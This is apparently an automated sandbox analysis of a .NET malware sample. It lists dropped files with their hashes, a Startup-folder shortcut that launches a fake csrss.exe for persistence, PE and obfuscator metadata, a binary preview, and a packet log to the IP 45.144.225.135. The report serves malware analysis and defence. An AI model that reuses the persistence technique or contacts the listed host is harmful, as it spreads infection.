C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tmp70CEtmp.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.356708753875314
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
MD5:	3197B1D4714B56F2A6AC9E83761739AE
SHA1:	3B38010F0DF51C1D4D2C020138202DABB686741D
SHA-256:	40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
SHA-512:	58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe Download File
Process:	C:\Users\user\Desktop\LZF5sOWnss.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3627520
Entropy (8bit):	6.686736411250198
Encrypted:	false
SSDEEP:	49152:JJjN9IQEiXrMhVoo5g+XoQG15WzZp13/Ln7c4lo4nC8sbXQdrb:bnIQEiUEPb
MD5:	D572DA9202196121D952231F26D65D07
SHA1:	8934580E7EE3F3852E159298769BDD38BCAA12A0
SHA-256:	15337A846C1E262136124361B3624DDD3519CF3C7F93ABA1ED75728A482FC662
SHA-512:	DE311F400E980D5FC987D6A5262057823B9DC3F9E7930623FAB16C9954977949B3B0901DE136548DB1F3A7B5D864DAD2738C791D511241CE4E49E8D83F7DEA5A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X..`.................(7..0.......G7.. ...`7...@.. ........................7...........@.................................8G7.W....`7. ,....................7...................................................... ............... ..H............text....'7.. ...(7................. ..`.rsrc... ,...`7......7.............@..@.reloc........7......X7.............@..B................tG7.....H.......<-7..............3..@.6..........................................0.............-.&(....+.&+.....0..........s....(....t.....-.&+......+.....~......0...........(......-.&+.(....+..........................0..'........,..{....,..{....o.......-.&&+.(....+.*..0..L........s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&..:....&.{.....o.....{......s....o.....{....r...po.....{.....P..s....o.....{.....o.....{....r...po

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url Download File
Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"file:///C:\ProgramData\LKBNMTFJgl\csrss.exe">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	69
Entropy (8bit):	5.096227769358395
Encrypted:	false
SSDEEP:	3:HRAbABGQYm8h6rXZkRE4rsjvKaBCH:HRYFVm8hAW1rsjv/E
MD5:	E03E6937BA1878ACE3D849B233ADECFE
SHA1:	AFFBB4F8B53AF6CF35660B775A0A8F70FB95F8B5
SHA-256:	9846A8975F8E2DBC96CD18D5015C03B4D8226FDDF69BCB99A0610C855B0A9E6D
SHA-512:	99EA03B8635D89409C6E65DC1DD1E995EAC8C02E373F3B01FAA7D715F347722075CC0D5D629914399505A2CA8FFB80BFA8CAFA9D99A2E702D1FCD94FB0BAECA9
Malicious:	true
Yara Hits:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url, Author: @itsreallynick (Nick Carr)
Preview:	[InternetShortcut]..URL="file:///C:\ProgramData\LKBNMTFJgl\csrss.exe"

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.3976224690140695
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	LZF5sOWnss.exe
File size:	16896
MD5:	0f65b4fa711b40e3c89a81fa69d8690f
SHA1:	19240a26f205be2f8b4f4e00583a987e184f2875
SHA256:	af18c1e923667ab287cd2699203e0bb6e6030dee131299ea670bc842dec76745
SHA512:	82a3f01024ebf9c56c6f77d4c51003d3892e6da40a0efea34e08ddcca6786f3e3e7b6e2b18a95bf407c723a770f71e94eb90f68fb18726513a0dbac35b7e8f52
SSDEEP:	192:e1XXt7VozmA38ntuvXOIhOWAVYidnab4WmdzdtjrII1dpv0:e1H9Vmx3+u+Inmh51dp8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P.`.....................0......^.... ...@....@.. ....................................@................................

File Icon


Icon Hash:	c0d8d8d8ccda92b0

Static PE Info

General
Entrypoint:	0x402e5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60F850F2 [Wed Jul 21 16:53:06 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e04	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x2c30	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe64	0x1000	False	0.511962890625	data	5.2035539058	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x2c30	0x2e00	False	0.368291440217	data	5.44307631724	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x4130	0x25a8	data
RT_GROUP_ICON	0x66d8	0x14	data
RT_VERSION	0x66ec	0x340	data
RT_MANIFEST	0x6a2c	0x204	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright @ EZIRIZ
Assembly Version	6.5.0.0
InternalName	msiexec.exe
FileVersion	6.5.0.0
CompanyName	EZIRIZ
LegalTrademarks
Comments	.NET Reactor
ProductName	Product
ProductVersion	6.5.0.0
FileDescription	.NET Reactor
OriginalFilename	msiexec.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 23, 2021 22:24:24.349776983 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.379445076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.379647017 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.402663946 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.434582949 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.436306000 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.436355114 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.436386108 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.436400890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.436417103 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.436445951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.436464071 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.436470032 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.436480999 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.436496973 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.436503887 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.436512947 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.436537981 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.436563015 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.468187094 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468513012 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468540907 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468564987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468590021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468595028 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.468614101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468636990 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.468641043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468666077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468679905 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.468688965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468707085 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.468713045 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468740940 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468765974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468775988 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.468789101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468808889 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.468812943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468836069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468847036 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.468859911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468883038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468898058 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.468905926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468933105 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468954086 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.468956947 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.468992949 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.498452902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498507977 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498534918 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498560905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498585939 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498601913 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.498610973 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498622894 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.498639107 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498670101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498696089 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498697996 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.498711109 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.498720884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498750925 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498779058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498802900 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498833895 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.498840094 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498842955 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.498867989 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498904943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498923063 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.498933077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498960972 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.498994112 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.498999119 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.499001026 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499027014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499053955 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499073029 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.499083996 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499111891 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499157906 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.499165058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499193907 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499219894 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.499228954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499253035 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499267101 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.499278069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499301910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499324083 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.499342918 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499367952 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499382973 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.499393940 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499419928 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499445915 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499449015 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.499471903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499485970 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.499495983 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499520063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499533892 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.499543905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499567986 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499592066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.499639034 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.499680996 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.528577089 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528603077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528623104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528640985 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528657913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528677940 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528701067 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528723001 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528745890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528770924 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528795958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528805971 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.528819084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528827906 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.528831959 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.528835058 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.528841972 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528863907 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.528866053 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528889894 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528912067 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.528913021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528935909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528959036 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528985023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.528999090 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529011011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529020071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529035091 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529057026 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529079914 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529083967 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529103041 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529105902 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529125929 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529149055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529175043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529186010 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529197931 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529217958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529242039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529263973 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529289007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529313087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529314995 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529324055 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529326916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529334068 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529335022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529360056 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529382944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529403925 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529408932 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529428005 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529429913 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529449940 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529475927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529478073 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529498100 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529520035 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529526949 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529541969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529563904 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529571056 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529587030 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529607058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529617071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529628992 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529654026 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529655933 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.529676914 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.529699087 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.558494091 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558530092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558552980 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558577061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558597088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558614016 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558636904 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558641911 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.558659077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558674097 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.558681011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558701038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558715105 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.558722973 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558743954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.558753967 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.558768034 CEST	80	49750	45.144.225.135	192.168.2.4
